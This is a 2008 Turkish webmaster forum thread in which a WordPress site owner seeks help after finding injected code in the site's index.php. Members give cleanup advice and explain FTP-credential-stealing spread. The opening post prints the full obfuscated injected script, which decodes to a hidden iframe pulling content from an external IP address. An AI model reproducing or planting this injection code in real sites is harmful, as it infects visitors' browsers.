Wp sitemde virüs var yardım,lütfen

efekentli · #1 (**permalink**) 2008-07-03, 16:41

Merhaba arkadaşlar. Bugun birisinden mail aldım sitede virüs var diye firefox hiç uyarı vermiyor , internet explorereden girdim gerçekten sitemde virüs var. Bende diyorum hitler neden düştü.

Datebaseyi kontrol ettim bişey yok gibi ama index.php de söyle bir kod var :

Kod:

<script>
<!--
var d=document,kol=561;
function O10H486CC1D4F080B(H486CC1D4F1004){ var H486CC1D4F1803 = 16; return( parseInt(H486CC1D4F1004,H486CC1D4F1803));}function H486CC1D4F2813(H486CC1D4F300B){ function H486CC1D5005B5() {return 2;} var H486CC1D4F3804='';for(H486CC1D4F3FFC=0; H486CC1D4F3FFC<H486CC1D4F300B.length; H486CC1D4F3FFC+=H486CC1D5005B5()){ H486CC1D4F3804 += ( String.fromCharCode (O10H486CC1D4F080B(H486CC1D4F300B.substr(H486CC1D4F3FFC, H486CC1D5005B5()))));}return H486CC1D4F3804;} document.write(H486CC1D4F2813('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323735373636292B27353861303638345C272077696474683D373739206865696768743D333534207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>

Kesin virüs bu kodla alakalı ama bu kodu bir türlü bulamadım. index.php de ,headerde,footer.php de yok. Daha önce başınıza geldi mi böyle bişey ? Nerde olabilir bu kod ,yardımlarınızı rica ediyorum ( wp 2.3)

TuRKuaZz · #2 (**permalink**) 2008-07-03, 17:11

Bütün tema dosyalarını ve eklenti dosyalarını gözden geçir. Böyle birşey benim de başıma gelmişti. Genelde CHMod 777 verdiğin dosyalara bulaştırıyorlar.

cannot · #3 (**permalink**) 2008-07-03, 17:17

dosyalarını gözden geçir,scriptte bir şey olmadığından emin değilsen host sahibine taratmasını iste..

efekentli · #4 (**permalink**) 2008-07-03, 17:20

hala o kodları arıyorum ama bulamadım

aramaya devam

bunun hakkında bilgisi olan var mı ? nerden nasıl bulaşır bu virüs ?

efekentli · #5 (**permalink**) 2008-07-03, 17:32

çok ilginç bişey. wp admin panelindeki tema editöründen index.php e bakıyorum herhangi bir kod yok ama az önce ftpden dosyaları çektim.index.php de o kodu gördüm. Tekrar tema editöründen baktım o kod yok. Yani adam nasıl kod yerleştirmişse tema editöründe görünmüyor ancak ftpden indirip not defterinden açtığın zaman görünür. Acayip bişeymiş

Şimdi bundan sonra böyle bişeyle karşılaşmamak için ne yapmalı ?

TuRKuaZz · #6 (**permalink**) 2008-07-03, 17:52

CHMod ayarlarını değiştirmelisin. Sadece okunur ayarlaman gerekli.

sempaty · #7 (**permalink**) 2008-07-03, 17:54

bilgisayarına bulaşmış. o bilgisayardan başka ftp ye bağlanma. index.** gördüğü her dosyaya sızacaktır. temiz bir bilgisayardan ftp şifrelerini değiş, dosyaları temizleyip upload et. sonra virüslü bilgisayarını temizlemeye çalış. olmazsa format at..

efekentli · #8 (**permalink**) 2008-07-03, 18:46

bu bilgisayarımdaki dosyalara mı bulaşıyor yoksa direk ftpden bağlanıp ,oradaki indexphp dosyalarına mı bulaşıyor ? ( bilgisayarda çok var kontrol etmek işkence olur)

sempaty · #9 (**permalink**) 2008-07-03, 19:33

tahmin ettiğim ise, bağlandığın ftp lerin şifrelerini bilgisayarından alıyor ftp lere bağlanarak index isimli herhangi bir uzantılı her dosyaya <body> den sonrasına ekliyor (<body> yoksa başka bir yere ekliyor)

yani pcnde kaydedip yollamıyor. sadece bilgisayarındaki ftp şifrelerini ele geçiriyor.

bir zincir gibi. senin sitenden mesela benim pc ye ordan da sitelerime sızıyor. benim sitelerimden bir başkasınınkine vs.

genelde çin veya rus siteleri oluyor bu virüsü yayan

efekentli · #10 (**permalink**) 2008-07-04, 01:48

Alıntı:

sempaty´isimli üyeden Alıntı

tahmin ettiğim ise, bağlandığın ftp lerin şifrelerini bilgisayarından alıyor ftp lere bağlanarak index isimli herhangi bir uzantılı her dosyaya <body> den sonrasına ekliyor (<body> yoksa başka bir yere ekliyor)

yani pcnde kaydedip yollamıyor. sadece bilgisayarındaki ftp şifrelerini ele geçiriyor.

bir zincir gibi. senin sitenden mesela benim pc ye ordan da sitelerime sızıyor. benim sitelerimden bir başkasınınkine vs.

genelde çin veya rus siteleri oluyor bu virüsü yayan

bahsettiğin gibi body den sonrasına eklenmiş. Firefoxda hiç farkına varmadım çünkü firefoxda virüs kodları aktif olamıyor. Rastgele birisi mail göndermese haberim olmayacaktı. Sitenin hitleri hala kendine gelmedi

( firefox'un güvenli olmasının zararı da bu olsa gerek .Sitene virüs bulaştığını bile fark edemiyosun

)

Bilgiler için teşekkür ederim

LinkBacks (?) LinkBack to this Thread: http://forum.iyinet.com/webmaster-genel-konular/98745-wp-sitemde-virus-var-yardim-lutfen.html
Konuyu Başlatan	For	Type	Tarih
Wp sitemde virüs var yardım,lütfen - Webmaster Forumu	This thread	Refback	2009-05-01 07:17

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Benzer Konular
Konu	Konuyu Başlatan	Forum	Cevaplar	Son Mesaj
sitemde sql sorunu var yardım..	netistanbul	Veritabanları	4	2006-09-26 21:40
sitemde sql hatası var acil yardım	netistanbul	PHP	3	2006-09-24 01:27
Web Sitemde Virüs :(	Uurz	Zararlı Yazılımlar ve Spam	22	2006-09-09 12:40
Virüs Yardım Plsss !	SempatiX	Zararlı Yazılımlar ve Spam	16	2006-04-20 16:41
Virüs var, Yardım, PE_SPACES.1445	alonso	İşletim sistemi	1	2002-12-07 23:07

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)